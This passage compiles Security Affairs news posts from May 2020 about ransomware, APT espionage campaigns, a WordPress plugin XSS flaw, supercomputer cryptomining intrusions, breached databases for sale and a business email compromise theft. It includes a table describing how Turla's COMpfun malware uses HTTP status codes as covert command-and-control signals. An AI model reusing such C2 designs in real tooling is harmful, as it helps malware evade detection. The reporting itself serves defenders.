“ProLock operators used two main vectors of initial access: QakBot (Qbot) and unprotected Remote Desktop Protocol (RDP)-servers with weak credentials.” reads the report published by Group-IB.

“The latter is a fairly common technique among ransomware operators. This kind of access is usually bought from a third party but may be obtained by group members as well.”

In March, threat actors behind PwndLocker changed the name of their malware to ProLock, immediately after security firm Emsisoft released a free decryptor tool.

According to the popular investigator Brian Krebs, the systems at Diebold Nixdorf were recently infected by the ProLock ransomware (aka PwndLocker), the same piece of ransomware involved in the attack against Lasalle County, Ill. in March.

“Fabian Wosar, Emsisoft’s chief technology officer, said if Diebold’s claims about not paying their assailants are true, it’s probably for the best: That’s because current versions of ProLock’s decryptor tool will corrupt larger files such as database files.” reads the analysis published by Krebs.

“As luck would have it, Emsisoft does offer a tool that fixes the decryptor so that it properly recovers files held hostage by ProLock, but it only works for victims who have already paid a ransom to the crooks behind ProLock.

“We do have a tool that fixes a bug in the decryptor, but it doesn’t work unless you have the decryption keys from the ransomware authors,” Wosar said.”

Pierluigi Paganini

(SecurityAffairs – ProLock, hacking)

The post FBI warns US organizations of ProLock ransomware decryptor not working appeared first on Security Affairs.

Stored XSS in WP Product Review Lite plugin allows for automated takeovers

A critical flaw in the WP Product Review Lite plugin installed on over 40,000 WordPress sites could potentially allow their take over.

Attackers could exploit a critical vulnerability in the WP Product Review Lite WordPress plugin to inject malicious code and potentially take over vulnerable websites.

The WP Product Review Lite plugin allows site owners to quickly create custom review articles using pre-defined templates, it is currently installed on over 40,000 WordPress sites.

The vulnerability was discovered by researchers at Sucuri Labs, it is a persistent XSS that could be exploited by remote, unauthenticated attackers.

“During a routine research audit for our Sucuri Firewall, we discovered an Unauthenticated Persistent Cross-Site Scripting (XSS) affecting 40,000+ users of the WP Product Review plugin.” reads the analysis published by Sucuri.

“All user input data is sanitized but the WordPress function used can be bypassed when the parameter is set inside an HTML attribute. A successful attack results in malicious scripts being injected in all the site’s products.”

Attackers can bypass the WordPress user input data sanitization function to exploit the Stored Cross-Site Scripting (Stored XSS) issue. Upon triggering the flaw, the attackers could inject malicious scripts in all the products stored in the database of the targeted website.

An attacker could trick a site admin into accessing the compromised products, then they could redirect them to a rogue site, or steal the session cookies to authenticate on behalf of the administrator.

Once the attacker has authenticated as an admin, it could add a new admin account to take over the site.

Researchers at the Sucuri Labs revealed that they are not aware of any attacks in the wild exploiting the flaw.

Experts recommend site administrators to update their plugin to version 3.7.6 as soon as possible because unauthenticated attacks could be automated by attackers.

“Unauthenticated attacks are very serious because they can be automated, making it easy for hackers to mount successful, widespread attacks against vulnerable websites,” Sucuri Labs conclude.

“The number of active installs, the ease of exploitation, and the effects of a successful attack are what makes this vulnerability particularly dangerous.”

The vulnerability was reported to the plugin developers on May 13, and it was fixed in only 24 hours, on May 14, 2020.

At the time of writing, more than 7,000 users have already fixed their WP Product Review Lite plugin, this means that more than 32,000 sites have yet to do it.

Pierluigi Paganini

(SecurityAffairs – WP Product Review Lite, hacking)

The post Stored XSS in WP Product Review Lite plugin allows for automated takeovers appeared first on Security Affairs.

Experts reported the hack of several supercomputers across Europe

Organizations managing supercomputers across Europe reported their systems have been compromised to deploy cryptocurrency miners.

Crooks have compromised supercomputers across Europe to deploy cryptocurrency miners, incidents have been already reported in the UK, Germany, and Switzerland. Rumors are circulating about a similar infection of a supercomputer located in Spain.

The supercomputers have shut down to investigate the security breaches.

On Monday, the German bwHPC organization announced that five of its supercomputers had to be shut down due to a cryptominer infection.

Below the message published by the organization:

“Dear users, due to an IT security incident the state-wide HPC systems

  • bwUniCluster 2.0,
  • ForHLR II,
  • bwForCluster JUSTUS,
  • bwForCluster BinAC, and
  • Hawk”

Another system that was reportedly infected early last week, is the ARCHER supercomputer at the University of Edinburgh.

“Due to a security exploitation on the ARCHER login nodes, the decision has been taken to disable access to ARCHER while further investigations take place.” reads the status page for the system.

“As you may be aware, the ARCHER incident is part of a much broader issue involving many other sites in the UK and internationally. We are continuing to work with the National Cyber Security Centre (NCSC) and Cray/HPE and further diagnostic scans are taking place on the system.”

The organization reset SSH passwords in response to the incident.

On Wednesday another supercomputer was compromised the system was located in Barcelona, Spain and the infection was reported by security researcher Felix von Leitner.

“More incidents surfaced the next day, on Thursday. The first one came from the Leibniz Computing Center (LRZ), an institute under the Bavarian Academy of Sciences, which said it was disconnected a computing cluster from the internet following a security breach.” reported ZDNet.

“The LRZ announcement was followed later in the day by another from the Julich Research Center in the town of Julich, Germany. Officials said they had to shut down the JURECA, JUDAC, and JUWELS supercomputers following an “IT security incident.”

Other similar incidents made the headlines, on Saturday a high-performance computing cluster at the Faculty of Physics at the Ludwig-Maximilians University in Munich, Germany was infected with a malware.

The Swiss Center of Scientific Computations (CSCS) in Zurich, Switzerland also reported a cyber incident and it shut down any external access to its infrastructure in response to the security breach.

“CSCS detected malicious activity in relation to these attacks. Due to this situation, the external access to the centre has been closed until having restored a safe environment. The users were informed immediately and are kept up to date. Not affected are the weather forecasts of MeteoSwiss, which are also calculated at CSCS.” reads the security advisory.

“We are currently investigating the illegal access to the centre. Our engineers are actively working on bringing back the systems as soon as possible to reduce the impact on our users to a minimum” says CSCS-Director Thomas Schulthess.”

Today, the Computer Security Incident Response Team (CSIRT) for the European Grid Infrastructure has released technical details of a malware involved in these incidents.

Researchers from security firm Cado Security also released Indicators of Compromise (IoCs).

ZDNet, citing the opinion of a security researcher, speculates that threat actors have exploited the CVE-2019-15666 vulnerability to gain root access to the supercomputers then deploy a Monero (XMR) cryptocurrency miner.

Other experts speculate that the supercomputers were hacked by nation-state actors because they were involved in the research on the COVID-19 outbreak.

Pierluigi Paganini

(SecurityAffairs – supercomputers, hacking)

The post Experts reported the hack of several supercomputers across Europe appeared first on Security Affairs.

Coronavirus-themed attacks May 10 – May 16, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 10 to May 16, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 12 – Zeus Sphinx continues to be used in COVID-19-themed attacks

The Zeus Sphinx banking Trojan continues to evolve while receiving new updates it is employed in ongoing coronavirus-themed scams. 

May 13 – Crooks continues to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

May 14 – China-linked hackers are attempting to steal COVID-19 Vaccine Research

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal COVID-19 vaccine research.

May 16 – Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

May 16 – QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in COVID-19-themed phishing campaign, crooks promise victims COVID-19 tax relief.

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Coronavirus-themed attacks May 10 – May 16, 2020 appeared first on Security Affairs.

Security Affairs newsletter Round 264

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

Blue Mockingbird Monero-Mining campaign targets web apps
Shiny Hunters group is selling data from 11 companies on the Dark Web
Swiss rail vehicle manufacturer Stadler hit by a malware-based attack
ATM vendor Diebold Nixdorf suffered a Ransomware attack
Experts disclose security flaws in Oracles iPlanet Web Server
GDPR Data Security Checklist in the Age of COVID-19 and the Remote Workforce
Sodinokibi ransomware uses MS API to encrypt open and locked files
STAMINA, a new approach to malware detection by Microsoft, Intel
VMware is going to fix recent Salt issues in vROps
A cyber attack hit a port on Strait of Hormuz, Iran said
Adobe addresses critical issues in Acrobat, Reader, and DNG SDK
Patch now your vBulletin install before hacker will target your forum
Popular Page Builder WordPress plugin fixes critical issues. Update it now!
Trojan Lampion is back after 3 months
Zeus Sphinx continues to be used in Coronavirus-themed attacks
Chancellor Merkel has ‘hard evidence of Russian hackers targeted her
Crooks continues to use COVID-19 lures, Microsoft warns
Expert found 1,236 websites infected with Magecart e-skimmer
Healthcare giant Magellan Health discloses data breach after ransomware attack
Microsoft May 2020 Patch Tuesday fixes 111 flaws, 13 Critical
USCYBERCOM shares five new North Korea-linked malware samples
China-linked hackers are attempting to steal COVID-19 Vaccine Research
Crooks stole $10 million from Norways state investment fund Norfund
Google WordPress Site Kit plugin grants attacker Search Console Access
New Ramsay malware allows exfiltrating files from air-gapped computers
Zerodium will no longer acquire certain types of iOS exploits due to surplus
Chinese APT Tropic Trooper target air-gapped military Networks in Asia
Interserve UK defense contractor hacked, up to 100,000 past and present employees details exposed
Palo Alto Networks addresses tens of serious issues in PAN-OS
Russian APT Turlas COMpfun malware uses HTTP status codes to receive commands
Threat actors are offering for sale 550 million stolen user records
APT group targets high profile networks in Central Asia
Microsoft is open-sourcing COVID-19 threat intelligence
QNodeService Trojan spreads via fake COVID-19 tax relief

Pierluigi Paganini

(SecurityAffairs – newsletter, hacking)

The post Security Affairs newsletter Round 264 appeared first on Security Affairs.

Elexon, a middleman in the UK power grid network hit by cyber-attack

Elexon, a middleman in the UK power grid network, recently reported it was hit by a cyber attack.

Elexon, a middleman in the UK power grid network, was the victim of a cyber attack, the incident impacted only affected the internal IT network, including the company’s email server, and employee laptops

“Hackers have targeted a critical part of the UK’s power network, locking staff out of its systems and leaving them unable to send or receive emails.” reads a post published by The Telegraph.

“Elexon – a key player in the energy market between power station operators and firms that supply households and businesses – said in a statement that its internal systems and company laptops had been affected by the cyberattack. It declined to give further details.”

The company manages electricity supply and demand and distributes the power around the network according to the demand.

“We are advising you that today that ELEXON’s internal IT systems have been impacted by a cyber attack. BSC Central Systems and EMR are currently unaffected and working as normal. The attack is to our internal IT systems and ELEXON’s laptops only.” reads a post published by the company on its website. “We are currently working hard to resolve this. However please be aware that at the moment we are unable to send or receive any emails.”

The company has taken down the email server in response to the attack.

According to Elexon, the systems use to manage the UK’s electricity transit were not impacted.

The company published a second message to announce that it has discovered the root cause of the incident, and that is was working to restore the internal network and employee laptops. Elexon also added that the BSC Central Systems (and their data) and EMR were not impacted and are continuing to work as normal. 

Even if the company did not reveal any details on the attack, experts speculate the involvement of a ransomware.

Experts from security firm Bad Packets reported that Elexon had been running an outdated version of Pulse Secure VPN server, if confirmed threat actors could have exploited it to access the internal network.

In January, the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) warned organizations that attackers continue to exploit the well known Pulse Secure VPN vulnerability tracked as CVE-2019-11510.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability, it could be easily exploited by using publicly available proof-of-concept code. The flaw can be used in combination with the CVE-2019-11539 remote command injection issue gain access to private VPN networks.

In October, the UK’s National Cyber Security Centre (NCSC) reported that advanced persistent threat (APT) groups have been exploiting recently disclosed VPN vulnerabilities in enterprise VPN products in attacks in the wild. Threat actors leverage VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure, to breach into the target networks.

The UK agency reported that APT groups target several vulnerabilities, including CVE-2019-11510 and CVE-2019-11539 in Pulse Secure VPN solutions, and CVE-2018-13379.

NSA also warned of multiple state-sponsored cyberespionage groups exploiting enterprise VPN Flaws

Despite Pulse Secure addressed the flaw in April, thousands of Pulse Secure VPN endpoints are yet to be fixed. In January 2020, Bad Packets reported that there were still 3,623 vulnerable Pulse Secure VPN servers, 1,233 of which were in the United States. The security firm confirmed, Elexon was still running an outdated Pulse Secure VPN installation.

The UK’s National Grid agency publicly announced that the incident did not affect electricity supply across the nation.

Pierluigi Paganini

(SecurityAffairs – Elexon, hacking)

The post Elexon, a middleman in the UK power grid network hit by cyber-attack appeared first on Security Affairs.

APT group targets high profile networks in Central Asia

Security firms have foiled an advanced cyber espionage campaign carried out by Chinese APT and aimed at infiltrating a governmental institution and two companies.

Antivirus firms have uncovered and foiled an advanced cyber espionage campaign aimed at a governmental institution and two companies in the telecommunications and gas sector.

The level of sophistication of the attack and the nature of targets suggests the involvement of an advanced persisten threat, likely from China, focused on cyber espionage activity in Central Asia.

Attackers used multiple commodity malware and previously unknown backdoors in the attacks, the analysis of their code suggests a possible link with multiple campaigns uncovered over several years.

Most of the C2 used by the attackers are hosted by the provider Choopa, LLC, and threat actors made large use of Gh0st RAT, a malware attributed to China-linked cyber espionage groups.

The security firm ESET and Avast first detected the attacks since September and January respectively. The researchers identified a host used as a repository containing hacking tools and backdoors, whose code has many similarities with malware previously associated with China-linked APT groups.

“The samples we analyzed contain links to malware samples and campaigns, such as MicrocinBYEBY, and Vicious Panda, previously described by Kaspersky, Palo Alto Networks, and Check Point, respectively. The backdoors we found are custom tools that have not previously been analyzed, as far as we know.” reads a report published by Avast. “The majority of the C&C servers are registered to Choopa, LLC, a hosting platform that has been used by cybercriminals in the past.”

Below a timeline of the attacks that appeared to be associated with the same threat actor.

Avast APT Timeline_May-2020

“An APT group, which we believe could possibly be from China, planted backdoors to gain long-term access to corporate networks. Based on our analysis, we suspect the group was also behind attacks active in Mongolia, Russia, and Belarus.” continues Avast.

Researchers from ESET that investigared into the attacks discovered three backdoors that collectively tracked as Mikroceen. The backdoors allowed the threat actors to manage the target file system, establish a remote shell, take screenshots, manage services and processes, and run console commands.

Below the list of backdoors published by ESET:

  • sqllauncher.dll (VMProtected backdoor)
  • logon.dll (VMProtected backdoor)
  • logsupport.dll (VMProtected backdoor)

Both “sqllauncher.dll” and “logon.dll” run as services and use the same C2 infrastructure, experts noticed that all of them feature protection against reverse engineering. Two of them, “sqllauncher.dll” and “logon.dll,” run as services and use the same C2 server.

Attackers use a version of the Mimikatz post-exploitation tool and rely on Windows Management Instrumentation (WMI) for lateral movement.

“Avast reported its findings to the local CERT team and reached out to the telecommunications company. We have not heard back from either organization.” concluded Avast.

“Avast has recently protected users in Central Asia from further attacks using the samples we analyzed.”

Both Avast and ESET have published a list of indicators of compromise (IoC) for the above threats.

Pierluigi Paganini

(SecurityAffairs – Microcin malware, hacking)

The post APT group targets high profile networks in Central Asia appeared first on Security Affairs.

Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

While the number of Coronavirus-themed attacks continues to increase increased Microsoft announced it is open-sourcing its COVID-19 threat intelligence to help organizations to repeal these threats.

“Microsoft processes trillions of signals each day across identities, endpoint, cloud, applications, and email, which provides visibility into a broad range of COVID-19-themed attacks, allowing us to detect, protect, and respond to them across our entire security stack.” reads a post published by Microsoft. “Today, we take our COVID-19 threat intelligence sharing a step further by making some of our own indicators available publicly for those that are not already protected by our solutions. “

Sharing information could offer the community a more complete view of attackers’ tactics, techniques, and procedures.

Microsoft experts have already been sharing examples of malicious lures and have provided guided hunting of COVID-themed attacks through Azure Sentinel Notebooks.

COVID malspam

Microsoft is going to publicly release some of its threat indicators, the company pointed out that its users are already protected against these attacks by Microsoft Threat Protection (MTP).

Microsoft has made available the indicators both in the Azure Sentinel GitHub repo, and through the Microsoft Graph Security API.

“These indicators are now available in two ways. They are available in the Azure Sentinel GitHub and through the Microsoft Graph Security API. For enterprise customers who use MISP for storing and sharing threat intelligence, these indicators can easily be consumed via a MISP feed.” continues Microsoft.

“This threat intelligence is provided for use by the wider security community, as well as customers who would like to perform additional hunting, as we all defend against malicious actors seeking to exploit the COVID crisis.”

This is just the beginning of the threat intelligence sharing of Coronavirus-related IOCs that will be offered through the peak of the outbreak.

Microsoft is releasing file hash indicators related to malicious email attachments employed in the campaigns. 

Azure Sentinel customers can import the indicators using a Playbook or access them directly from queries. Microsoft added that both Office 365 ATP and Microsoft Defender ATP already block the attacks associated with the above indicators.

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post Microsoft is open-sourcing COVID-19 threat intelligence appeared first on Security Affairs.

QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in Coronavirus-themed phishing campaign, crooks promise victims COVID-19 tax relief.

Researchers uncovered a new malware dubbed QNodeService that was employed in a Coronavirus-themed phishing campaign. The operators behind the campaign use COVID-19 lure promising victims tax relief.

The phishing messages use Trojan sample associated with a file named “Company PLP_Tax relief due to Covid-19 outbreak CI+PL.jar,” experts from MalwareHunterTeam noticed that the malicious code was only detected by ESET AV.

The QNodeService Trojan is written in Node.js and is delivered through a Java downloader embedded in the .jar file, Trend Micro warns. 

“Running this file led to the download of a new, undetected malware sample written in Node.js; this trojan is dubbed as “QNodeService”.” reads the analysis published by Trend Micro.

“The use of Node.js is an unusual choice for malware authors writing commodity malware, as it is primarily designed for web server development, and would not be pre-installed on machines likely to be targeted. However, the use of an uncommon platform may have helped evade detection by antivirus software.”

QNodeService is able to perform a broad range of activities, such as download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management. The malware can also steal system information including IP address and location, download additional malware payloads, and exfiltrate stolen data. The actual malware only targets Windows systems, but experts believe that developers are working to make it a cross-platform threat.

The Java downloader is obfuscated via Allatori in the bait document, the malware downloads the Node.js malware file (either “qnodejs-win32-ia32.js” or “qnodejs-win32-x64.js”) and a file called “wizard.js.” 

Either a 32-bit or 64-bit version of Node.js is dropped depending on the Windows system architecture of the target machine. 

The wizard.js file is an obfuscated Javascript (Node.js) file used to acheve persistence by creating a “Run” registry key entry and for downloading another malicious payload.

One of the most interesting feature implemented by the QNodeService malware is the support for an “http-forward” command, which allows attackers to download files without directly connecting to a victim’s PC. 

“Of particular note is the http-forward command, which allows an attacker to download a file without directly connecting to the victim machine, as shown below in figures 13-16.” continues Trend Micro. “However, a valid request path and access token are required to access files on the machine. The C&C server must first send “file-manager/forward-access” to generate the URL and access token to use for the http-forward command later.”

Trend Micro researchers included Indicators of Compromise (IoCs) in their report.

Unfortunately, Coronavirus-themed attacks continue to target individuals, businesses, and organizations worldwide.

At the end of March, experts from IBM X-Force uncovered a hacking campaign employing the Zeus Sphinx malware that focused on government relief payment.

Operators were spreading it in a spam campaign aimed at stealing victims’ financial information, the spam messages sent to the victims claim to provide information related to the Coronavirus outbreak and government relief payments

Researchers revealed that the malware is receiving constant upgrades to improve its capabilities. 

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post QNodeService Trojan spreads via fake COVID-19 tax relief appeared first on Security Affairs.

Chinese APT Tropic Trooper target air-gapped military Networks in Asia

Chinese threat actors, tracked as Tropic Trooper and KeyBoy, has been targeting air-gapped military networks in Taiwan and the Philippines.

Chinese APT group Tropic Trooper, aka KeyBoy, has been targeting air-gapped military networks in Taiwan and the Philippines, Trend Micro researchers reported.

The Tropic Trooper APT that has been active at least since 2011, it was first spotted in 2015 by security experts at Trend Micro when it targeted government ministries and heavy industries in Taiwan and the military in the Philippines.

The threat actor targeted government offices, military, healthcare, transportation, and high-tech industries in Taiwan, the Philippines, and Hong Kong.

Since December 2014, the threat actors are using a malware dubbed USBferry in attacks against military/navy agencies, government institutions, military hospitals, and also a national bank.

“Recently, we discovered the Tropic Trooper group targeting Taiwanese and the Philippine military’s physically isolated environment using a USBferry attack (the name derived from a sample found in a related research).” reads the analysis published by Trend Micro. “USBferry has variants that perform different commands depending on specific targets; it can also combine capabilities, improve its stealth in infected environments, and steal critical information through USB storage”

Tropic Trooper

The USBferry USB malware could execute various commands on specific the infected system and allow to exfiltrate sensitive data through USB storage.

According to Trend Micro’s telemetry, attacks that employ USBferry attack are ongoing since December 2014 and has been targeting military or government users located in Asia.

The malware was first mentioned in a PwC report that attributes it to Tropic Trooper APT, but that did not include a detailed analysis.

The attackers would first target organizations related to military or government that implements fewer security measures compared with the real targets, then they attempt to use them as a proxy to the final target. In one case, the hackers compromised a military hospital and used it to move to the military’s physically isolated network.

Trend Micro researchers identified at least three versions of the malware with different variants and components.”

“Tropic Trooper uses the old way of achieving infection: by ferrying the installer into an air-gapped host machine via USB.” continues the report. “They employ the USB worm infection strategy using the USB device to carry the malware into the target’s computer and facilitate a breach into the secure network environment.”

The group used “tracert” and “ping” commands to map the target’s network
architecture (i.e. “tracert -h 8 8.8.8.8” collects the route (path) and measures transit delays of packets across an Internet Protocol (IP) network, while pings allow testing the target network’s connectivity).

The attackers attempted to determine if the infected machine has access to the internal network and the target mail portal.

In the absence of network connectivity, the malware collects information from the machine and copy the data to the USB drive.

The experts also discovered that the hackers use different backdoors in a recent attack, including WelCome To SvchostWelcome To IDShell, and Hey! Welcome Server.

The arsenal of the APT group includes scanning tools, a command-line remote control listener/port relay tool, and backdoor payload/steganography payload execution loaders.

“This targeted attack operation can be broken down into four important points.” concludes the report. “First, putting critical data in physically isolated networks is not an overarching solution for preventing cyberespionage activities. Second, their preferred technique of steganography isn’t just used to deliver payloads, but also for sending information back to the C&C server. Third, several hacking tools and components can be used to fulfill attacks in different target networks and environments. These tools and components also have a selfdelete command to make it tricky to trace the attack chain and all the related factors. Lastly, using an invisible web shell hides their C&C server location and makes detecting malicious traffic more difficult for network protection products

Pierluigi Paganini

(SecurityAffairs – Tropic Trooper, hacking)

The post Chinese APT Tropic Trooper target air-gapped military Networks in Asia appeared first on Security Affairs.

Interserve UK defense contractor hacked, up to 100,000 past and present employees details exposed

Britain’s Ministry of Defence contractor Interserve has been hacked, intruders have stolen up to 100,000 past and present employees’ details.

Interserve, a contractor for the Britain’s Ministry of Defence suffered a security breach, hackers have stolen up to 100,000 of past and current employees details. The company currently has around 53,000 employees. Stolen data includes payment information and details of their next of kin.

“Outsourcing group Interserve is recovering from a cyberattack which took place over the weekend that may have seen the details of up to 100,000 people stolen.” reported The Telegraph.

“Hackers broke into a human resources database owned by the outsourcing firm, which recently helped build the Birmingham Nightingale Hospital, on May 9 and stole information on current and former Interserve employees, a company insider said.”

Attackers might have accessed to names, addresses, bank details, payroll information, next of kin details, HR records, dates of absences, and pension information.

The security breach took place early May, at the time there are no details about the attack and it is unclear the number of affected individuals.

“Interserve was the target of a cyber security attack earlier this month.” reads a press release published by the company on its website.

“Interserve is working closely with the National Cyber Security Centre (NCSC) and Strategic Incident Response teams to investigate, contain and remedy the situation. This will take some time and some operational services may be affected. Interserve has informed the Information Commissioner (ICO) of the incident. We will provide further updates when appropriate.”

The defense contractor is investigating the incident with the help of the National Cyber Security Centre.

According to the defense contractor’s website, Interserve is present on 35 MoD sites, the company also announced that it is supporting the NHS during COVID-19.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Interserve UK defense contractor hacked, up to 100,000 past and present employees details exposed appeared first on Security Affairs.

Russian APT Turla’s COMpfun malware uses HTTP status codes to receive commands

Russia-linked cyberespionage group Turla targets diplomatic entities in Europe with a new piece of malware tracked as COMpfun.

Security experts from Kaspersky Lab have uncovered a new cyberespionage campaign carried out by Russia-linked APT Turla that employs a new version of the COMpfun malware. The new malware allows attackers to control infected hosts using a technique that relies on HTTP status codes.

COMpfun was first spotted in the wild in 2014 by G DATA researchers, Kaspersky first observed the threat in autumn 2019 when it was employed in attacks against diplomatic entities across Europe.

“You may remember that in autumn 2019 we published a story about how a COMpfun successor known as Reductor infected files on the fly to compromise TLS traffic.” reads the analysis published by Kaspersky. “The campaign operators retained their focus on diplomatic entities, this time in Europe, and spread the initial dropper as a spoofed visa application.”

The Turla APT group (aka SnakeUroburosWaterbugVenomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

In March the APT group employed two new pieces of malware in watering hole attacks targeting several high-profile Armenian websites.

The COMpfun malware analyzed by Kaspersky implements a new technique to receive commands from the C2 as HTTP status codes.

COMpfun is a remote access trojan (RAT) that could collect system data, logs keystrokes, and takes screenshots.

Turla compfun

The new variant of the COMpfun malware includes two new features, the ability to monitor when USB removable devices plugged into or unplugged from the host, and the mentioned C2 communication technique.

The first feature was implemented to allow the malware propagating itself to the connected device.

The second feature was implemented to avoid detection, Turla vxers implemented new C2 protocol that relies on HTTP status codes.

HTTP status codes provide a state of the server and instruct clients on action to do (i.e. drop the connection), COMpfun exploited this mechanism to control the bot running on the compromised systems.

“We observed an interesting C2 communication protocol utilizing rare HTTP/HTTPS status codes (check IETF RFC 7231, 6585, 4918). Several HTTP status codes (422-429) from the Client Error class let the Trojan know what the operators want to do. After the control server sends the status “Payment Required” (402), all these previously received commands are executed.” continues the analysis.

For example, if the COMpfun server would respond with a 402 status code, followed by a 200 status code, the malicious code sends collected target data to C2 with the current tickcount.

Below the list of commands associated with common HTTP status codes:

HTTP statusRFC status meaningCorresponding command functionality
200OKSend collected target data to C2 with current tickcount
402Payment RequiredThis status is the signal to process received (and stored in binary flag) HTTP statuses as commands
422Unprocessable Entity (WebDAV)Uninstall. Delete COM-hijacking persistence and corresponding files on disk
423Locked (WebDAV)Install. Create COM-hijacking persistence and drop corresponding files to disk
424Failed Dependency (WebDAV)Fingerprint target. Send host, network and geolocation data
427Undefined HTTP statusGet new command into IEA94E3.tmp file in %TEMP%, decrypt and execute appended command
428Precondition RequiredPropagate self to USB devices on target
429Too Many RequestsEnumerate network resources on target

“The malware operators retained their focus on diplomatic entities and the choice of a visa-related application – stored on a directory shared within the local network – as the initial infection vector worked in their favor. The combination of a tailored approach to their targets and the ability to generate and execute their ideas certainly makes the developers behind COMPFun a strong offensive team.” concludes Kaspersky.

Pierluigi Paganini

(SecurityAffairs – Turla, malware)

The post Russian APT Turla’s COMpfun malware uses HTTP status codes to receive commands appeared first on Security Affairs.

Palo Alto Networks addresses tens of serious issues in PAN-OS

Palo Alto Networks addressed tens of vulnerabilities in PAN-OS, the software that runs on the company’s next-generation firewalls.

Palo Alto Networks has issued security updates to address tens of vulnerabilities in PAN-OS, the software that runs on the company’s next-generation firewalls.

One of the most severe vulnerabilities, tracked as CVE-2020-2018, is an authentication bypass vulnerability in the Panorama context switching feature. The flaw could be exploited by an attacker with network access to a Panorama’s management interface to gain privileged access to managed firewalls.

“An authentication bypass vulnerability in the Panorama context switching feature allows an attacker with network access to a Panorama’s management interface to gain privileged access to managed firewalls. An attacker requires some knowledge of managed firewalls to exploit this issue.” reads the advisory published by the vendor.

This vulnerability does not impact Panorama configured with custom certificates authentication for communication between Panorama and managed devices.

The issue received a CVSSv3.1 Base Score of 9, it affects PAN-OS 7.1 versions earlier than 7.1.26, PAN-OS 8.1 versions earlier than 8.1.12, PAN-OS 9.0 versions earlier than 9.0.6, and all versions of PAN-OS 8.0.

Palo Alto Networks also addressed an XML external entity reference (‘XXE’) vulnerability, tracked as CVE-2020-2012, that could lead to information leak.

The flaw could be exploited by unauthenticated attackers with network access to the Panorama management interface to read arbitrary files on the system.

The vendor also fixed a high-severity vulnerability, tracked as CVE-2020-2011, that could be exploited by a remote, unauthenticated attacker to trigger a denial-of-service (DoS) condition to all Panorama services by sending specially crafted registration requests.

Other high severity issues affect the previous Nginx version used in PAN-OS software, some of them could be exploited without authentication.

Palo Alto Networks also addressed serious cross-site scripting (XSS) vulnerability in the GlobalProtect Clientless VPN can be exploited to compromise a user’s session by tricking the victims into visiting a malicious website.

The full list of vulnerabilities addressed by Palo Alto Networks is available here.

Pierluigi Paganini

(SecurityAffairs – PaloAlto Networks, hacking)

The post Palo Alto Networks addresses tens of serious issues in PAN-OS appeared first on Security Affairs.

Threat actors are offering for sale 550 million stolen user records

Threat actors are offering for sale tens of databases on a hacker forum that contains roughly 550 million stolen user records.

Security experts from Cyble reported that a threat actor is attempting to sell twenty-nine databases on a hacker forum since May 7. Forum members could also buy each database individually. The archives allegedly contain a total of 550 million stolen user records.

Data appears to come from past data breaches, the oldest one dates back as 2012 while the latest one dates April 2020.

The data could be used by crooks to launch credentials stuffing attacks against individuals and organizations.

Hackers are also offering for sale a separate database containing 47.1 million phone numbers that are part of Dubsmash data breach that occurred in 2018.

Below the list of databases, published by Bleepingcomputer, that are available for sale:

CompanyAmountData Breach Date
Evite.com101 millionMarch 2019
Tokopedia.com91 millionApril 2020
piZap.com60.9 millionApril 2018
Netlog.com (Twoo.com)57 millionNovember 2012
Dubsmash.com Phone numbers47.1 millionDecember 2018
Shein.com42 millionJune 2018
Fotolog.com33.5 millionDecember 2018
CafePress.com23.6 millionFebruary 2019
Wanelo.com Customers23.2 millionDecember 2018
OMGPop.com21.4 millionAugust 2019
SinglesNet.com16.3 millionSeptember 2012
Bukalapak.com13 millionFebruary 2018
Bookmate.com8 millionJuly 2018
ReverbNation.com7.9 millionJanuary 2014
Wego.com6.5 millionN/A
EatStreet.com6.4 millionMay 2019
PumpUp.com6.4 millionN/A
CoffeeMeetsBagel.com6.2 millionMay 2018
Storybird.com4 millionDecember 2018
Minube.net3.2 millionMay 2019
Sephora.com3.2 millionJanuary 2017
CafeMom.com2.6 millionApril 2014
Coubic.com2.6 millionMarch 2019
Roadtrippers.com2.5 millionMay 2019
DailyBooth.com1.6 millionApril 2014
ClassPass.com1.6 millionOctober 2017
ModaOperandi.com1.3 millionApril 2019
Rencanamu.id (Youthmanual.com)1.1 millionJanuary 2019
StreetEasy.com1 millionMay 2018
Yanolja.com1 millionMarch 2019

Users can verify if their credentials are part of one of the above breaches querying the the Cyble’s amibreached.com data breach lookup service.

Those who have their account exposed in one of the above incidents are recommended to change their password.

Pierluigi Paganini

(SecurityAffairs – threat actors, hacking)

The post Threat actors are offering for sale 550 million stolen user records appeared first on Security Affairs.

Crooks stole $10 million from Norway’s state investment fund Norfund

Norway’s state investment fund, Norfund, suffered a business email compromise (BEC) attack, hackers stole $10 million.

Hackers stole $10 million from Norway’s state investment fund, Norfund, in a business email compromise (BEC) attack.

Norfund is a private equity company established by the Norwegian Storting (parliament) in 1997 and owned by the Norwegian Ministry of Foreign Affairs. The fund receives its investment capital from the state budget.

The fraudsters compromised the Norfund email system and monitored communications between the employees of the fund and their partners for months.

Once identified the employee that responsible for money transfers. the attackers created a Norfund email address to impersonate an individual authorized to transfer large sums of money through the bank Norfund.

